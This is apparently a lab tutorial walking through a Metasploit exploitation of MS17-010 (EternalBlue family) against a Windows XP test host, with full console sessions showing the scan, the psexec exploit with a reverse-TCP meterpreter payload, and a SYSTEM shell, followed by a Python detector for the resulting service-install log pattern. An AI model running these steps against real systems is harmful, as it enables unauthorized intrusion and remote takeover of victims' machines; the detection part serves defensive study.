This post briefly shows how to use Metasploit to run a penetration test against MS17-010; for learning purposes only.
| Test environment | Description | IP |
|---|---|---|
| Host | Kali 2020 | 192.168.1.113 |
| Target host | Windows XP SP3 | 192.168.1.108 |
① Start msf, search for ms17_010, and scan the target with the auxiliary module
```
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
3 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
4 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/smb/smb_ms17_010
msf6 > use 4
msf6 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.1.108 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.108
rhosts => 192.168.1.108
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.1.108:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[*] 192.168.1.108:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
```
② The result reports that the target is vulnerable to EternalBlue. Search again, select the ms17_010_psexec exploit module (index 2 in the session below) and set its parameters
```
msf6 auxiliary(scanner/smb/smb_ms17_010) > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
3 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
4 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > use 2
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.1.108 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.1.108
rhosts => 192.168.1.108
msf6 exploit(windows/smb/ms17_010_psexec) >
```
③ Run the exploit, obtain a meterpreter session and escalate privileges
```
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.108:445 - Target OS: Windows 5.1
[*] 192.168.1.108:445 - Filling barrel with fish... done
[*] 192.168.1.108:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.1.108:445 - [*] Preparing dynamite...
[*] 192.168.1.108:445 - [*] Trying stick 1 (x86)...Boom!
[*] 192.168.1.108:445 - [+] Successfully Leaked Transaction!
[*] 192.168.1.108:445 - [+] Successfully caught Fish-in-a-barrel
[*] 192.168.1.108:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.1.108:445 - Reading from CONNECTION struct at: 0x88c03010
[*] 192.168.1.108:445 - Built a write-what-where primitive...
[+] 192.168.1.108:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.108:445 - Selecting native target
[*] 192.168.1.108:445 - Uploading payload... kRwOnYlP.exe
[*] 192.168.1.108:445 - Created \kRwOnYlP.exe...
[+] 192.168.1.108:445 - Service started successfully...
[*] 192.168.1.108:445 - Deleting \kRwOnYlP.exe...
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Meterpreter session 3 opened (192.168.1.113:4444 -> 192.168.1.108:2363) at 2021-05-20 09:01:47 +0800
meterpreter > [*] Meterpreter session 4 opened (192.168.1.113:4444 -> 192.168.1.108:2323) at 2021-05-20 09:01:48 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
```
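The session above leaves a clear host-side footprint: an eight-letter executable (kRwOnYlP.exe) written over the ADMIN$ share into the Windows root, registered and started as a service, then deleted. The following is an added example, not code from the original post or from Metasploit, showing how a defender can flag that pattern in "service installed" records (Windows System log Event ID 7045); the event records and their field names are constructed for this example.

```python
import re

# Constructed sample records shaped like Windows System log 7045 entries
# ("A service was installed in the system"). Field names are an assumption.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "kRwOnYlP",
     "ImagePath": "%SystemRoot%\\kRwOnYlP.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "MyBackupAgent",
     "ImagePath": "C:\\Program Files\\Backup\\agent.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "UpdSvc",
     "ImagePath": "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "kRwOnYlP", "State": "running"},
]

# Eight mixed-case letters, the shape of the kRwOnYlP.exe payload in the session above.
RANDOM_NAME = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])[A-Za-z]{8}$")
# An .exe dropped directly into the Windows root (where ADMIN$ maps), not a subfolder.
WINROOT_EXE = re.compile(r"^(?:%SystemRoot%|[A-Za-z]:\\WINDOWS)\\[^\\]+\.exe$", re.I)
# First .exe path in the image path, ignoring surrounding quotes and trailing arguments.
EXE_PATH = re.compile(r'^"?([^"]+?\.exe)', re.I)


def service_install_reasons(event):
    """Return the reasons a 7045 record looks like a psexec-style service drop; empty if none."""
    reasons = []
    if event.get("EventID") != 7045:
        return reasons
    name = event.get("ServiceName", "")
    match = EXE_PATH.match(event.get("ImagePath", ""))
    exe_path = match.group(1) if match else ""
    binary = exe_path.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
    if WINROOT_EXE.match(exe_path):
        reasons.append("binary placed directly in the Windows root")
    if RANDOM_NAME.match(name):
        reasons.append("random-looking 8-letter service name")
    if RANDOM_NAME.match(binary):
        reasons.append("random-looking 8-letter binary name")
    if reasons and event.get("AccountName") == "LocalSystem":
        reasons.append("runs as LocalSystem")
    return reasons


def scan(events):
    """Map each suspicious service name to its list of reasons."""
    flagged = {}
    for event in events:
        reasons = service_install_reasons(event)
        if reasons:
            flagged[event["ServiceName"]] = reasons
    return flagged
```

Because the module deletes the dropped binary right after the service starts, the file is usually gone by the time anyone looks; the service-install log record is the durable artefact to alert on.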